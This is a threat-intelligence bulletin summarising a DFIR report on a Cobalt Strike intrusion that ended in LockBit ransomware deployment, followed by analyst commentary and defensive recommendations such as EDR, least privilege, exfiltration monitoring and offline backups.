Summary:
Such a sophisticated intrusion was initiated in January 2024 with a user downloading and executing the malicious file named setup_wm.exe, masquerading as the Windows Media Configuration Utility, with an almost legitimate-looking filename and icon. The executed file dropped a Cobalt Strike beacon that established an outbound C2 channel. Within 30 minutes of execution, the attackers initiated some reconnaissance activities, using tools like nltest to enumerate domain controllers.

The threat actors then established the usage of multiple proxy tools such as SystemBC and GhostSOCKS to maintain persistence and traverse laterally within the environment. Over the course of the next few days, they leveraged a combination of tools: PsExec, WMI, and Rclone. Initial attempts at exfiltration via FTP failed, but the attackers shifted later to MEGA.io using Rclone and succeeded in exfiltrating gigabytes of sensitive information within a 16-hour timeframe. On the eleventh day, LockBit ransomware was released onto all available Windows hosts through batch scripts, scheduled tasks, and administrative tools to maximize their impact. Because of this, data got encrypted to such an extent that it almost paralyzed the operation of the victim.

Security Officer Comments:
This incident has shown the ever-sophisticated and persistent ransomware operations. The use of Cobalt Strike for initial access and command and control is a hallmark of advanced threat actors; however, the integration of proxies such as SystemBC and GhostSOCKS shows how they adaptively maintain access and evade detection. The fact that the attackers were able to change their techniques-for example, from using FTP to using MEGA.io for data exfiltration-shows their resourcefulness. It took 11 days to deploy the LockBit ransomware, and that does demonstrate careful planning and the systematic exploitation of the environment.

Organizations should understand that such an attack is multilayered in nature, with each phase-initial access, persistence, discovery, lateral movement, exfiltration, and impact-pretty well thought out. This further requires detection mechanisms at every stage of the kill chain, along with proactive measures to mitigate the vulnerabilities before they are actually exploited.

Suggested Corrections:

• Enhance Endpoint Detection and Response (EDR): Deploy advanced EDR solutions to monitor and detect malicious activities, such as process injection, unusual use of scheduled tasks, and execution of tools like Cobalt Strike and Rclone.
• Restrict Privileges: Enforce the principle of least privilege to minimize the potential damage from compromised accounts. Ensure administrative privileges are granted only when absolutely necessary.
• Monitor Network Traffic: Implement network traffic monitoring to detect and block connections to known malicious C2 servers and proxies, including those used by SystemBC and GhostSOCKS.
• Strengthen Exfiltration Defenses: Monitor for unauthorized use of file-sharing services and cloud storage solutions like MEGA.io. Deploy data loss prevention (DLP) tools to block unauthorized data transfers.
• Regularly Audit System Configurations: Periodically review scheduled tasks, registry settings, and Group Policy Objects (GPOs) for unauthorized changes. Implement robust change management processes to detect and respond to suspicious modifications.
• Patch and Update: Ensure systems are regularly patched to mitigate vulnerabilities that could be exploited for initial access or lateral movement.
• Backup and Recovery: Maintain secure, offline backups and routinely test disaster recovery procedures. This is critical to minimizing downtime and data loss in the event of a ransomware attack.
• Security Awareness Training: Train employees to recognize phishing emails and suspicious file downloads to reduce the risk of initial compromise.

There are IOCs as well as other detection items that are available via the source link.

Link(s):
https://thedfirreport.com/2025/01/27/cobalt-strike-and-a-pair-of-socks-lead-to-lockbit-ransomware/